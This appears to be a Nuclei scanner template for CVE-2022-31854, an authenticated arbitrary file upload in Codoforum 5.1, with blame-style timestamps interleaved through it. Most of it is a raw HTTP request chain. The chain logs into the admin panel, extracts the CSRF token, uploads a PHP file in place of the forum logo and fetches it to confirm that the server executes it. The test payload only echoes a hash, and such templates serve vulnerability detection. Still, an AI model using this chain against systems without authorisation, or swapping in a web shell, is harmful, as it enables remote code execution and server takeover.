2023-03-18 22:07:09 +00:00
id : CVE-2022-31854
info :
2023-03-28 19:58:06 +00:00
name : Codoforum 5.1 - Arbitrary File Upload
2023-03-18 22:07:09 +00:00
author : theamanrawat
severity : high
description : |
2023-03-28 20:44:12 +00:00
Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patch or upgrade to a patched version of Codoforum.
2023-03-18 22:07:09 +00:00
reference :
- https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
2023-03-20 07:05:15 +00:00
- https://codoforum.com
- https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc
2023-03-28 19:58:06 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-31854
2024-03-23 09:28:19 +00:00
- https://github.com/trhacknon/Pocingit
2023-03-18 22:07:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2022-31854
cwe-id : CWE-434
2024-03-23 09:28:19 +00:00
epss-score : 0.17108
epss-percentile : 0.95958
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:*
2023-03-18 22:07:09 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 4
2023-07-11 19:49:27 +00:00
vendor : codologic
product : codoforum
2023-12-05 09:50:33 +00:00
tags : cve,cve2022,rce,codoforumrce,authenticated,intrusive,codologic
2023-03-18 22:07:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- raw :
- |
POST /admin/?page=login HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB
------WebKitFormBoundaryACGPpj7UIqmtLNbB
Content-Disposition : form-data; name="username"
{{username}}
------WebKitFormBoundaryACGPpj7UIqmtLNbB
Content-Disposition : form-data; name="password"
{{password}}
------WebKitFormBoundaryACGPpj7UIqmtLNbB--
- |
GET /admin/index.php?page=config HTTP/1.1
Host : {{Hostname}}
- |
POST /admin/index.php?page=config HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
Content-Disposition : form-data; name="site_title"
2023-03-31 18:19:14 +00:00
2023-03-18 22:07:09 +00:00
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
Content-Disposition : form-data; name="forum_logo"; filename="{{randstr}}.php"
Content-Type : application/x-httpd-php
<?php
echo md5('CVE-2022-31854');
? >
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
Content-Disposition : form-data; name="CSRF_token"
{{csrf}}
------WebKitFormBoundaryoLtdjuqj2ixPvBhA--
- |
GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
2023-07-11 19:49:27 +00:00
- status_code_4 == 200
- contains(content_type_4, "text/html")
- contains(body_4, "a63fd49130de6406a66600cd8caa162f")
2023-03-18 22:07:09 +00:00
condition : and
extractors :
- type : regex
name : csrf
group : 1
regex :
2023-07-11 19:49:27 +00:00
- name="CSRF_token" value="([0-9a-zA-Z]+)"/>
2023-03-18 22:07:09 +00:00
internal : true
2024-03-25 11:57:16 +00:00
# digest: 490a0046304402200fc44f8569c5b730415b2491b31a8709cd4a5c096a8e8dd650d1d58108709768022004858ff3b8255a696b01d2443eaf22d347e26d244a63611c77aee1c00133b538:922c64590222798bb761d5b6d8e72950